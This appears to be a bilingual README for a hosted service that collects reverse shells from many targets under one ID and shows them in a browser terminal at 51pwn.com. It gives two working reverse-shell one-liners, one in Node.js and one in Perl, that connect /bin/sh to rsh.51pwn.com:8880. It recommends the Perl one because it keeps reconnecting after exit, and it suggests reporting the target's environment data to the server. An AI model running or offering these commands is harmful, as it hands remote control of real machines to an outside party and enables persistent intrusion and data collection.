Supply chain security research and verification are completed, and relevant findings have been reported xtermjs/xterm.js#4857
one id Multi-target 免费的web版本 “nc -lnvp 8880” 支持多客户端回连,通过id关联【请勿用于非法活动】
- Site: https://51pwn.com/indexes/xterm.html?id=YourId
- reverse server: rsh.51pwn.com:8880
1 one id Multi-target concurrency reverse shell
2 setYourId: xxxx_001 ** The id must be sent to the server as soon as the reverse shell connects to the server to facilitate association with your web.(id 必须在reverse shell连接服务器后第一时间发送给服务器,便于和你的web进行关联) ** awesome: It is no longer a simple nc -lnvtp xxx, but can accept several target reverse shells at the same time.(他不再是简单的nc -lnvtp xxx,而是可以同时接受若干目标reverse shell)
2 start your reverse shell *** id is a unique identification and association between you and all reverse shell targets(id 是 唯一标识、关联你与所有reverse shell 目标之前的关联、关系) *** The second line is a json data, which can usually be used to collect the target's environment information and feed it back to the server. Of course you can give feedback {}。 第二行是一个json 数据,通常可以用来收集目标的环境信息,反馈给server。当然你可以反馈一个空的{} Note: A good reverse shell will keep reconnecting to the server even if you type exit 注意:一个优秀的reverse shell会吃重要,即便你输入 exit 也会不断重新连接到服务器
node -e '(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8880, "rsh.51pwn.com", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);client.write("YourId\n{}\n");client.write("{}\n") }); return /a/;})();'
*** 特别推荐下面的命令,经过若干 AI 的优化,可以覆盖 90% 以上的服务器上正确运行, 下面的命令明显比上面的更加优化,即便你关闭浏览器,或者输入exit,下面的代码会自动重新上线
perl -e 'use Socket;while (1) {socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(8880,inet_aton("rsh.51pwn.com")))){print S "YourId\n{}\n";open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");if (fork() == 0){exec("/bin/sh -i");}wait();}};'
- open your browser *** 注意后面的id必须和上面的一致 https://51pwn.com/indexes/xterm.html?id=YourId ** 注意,这个时候你什么也没有看见,没错,因为还没有目标连接上来 **
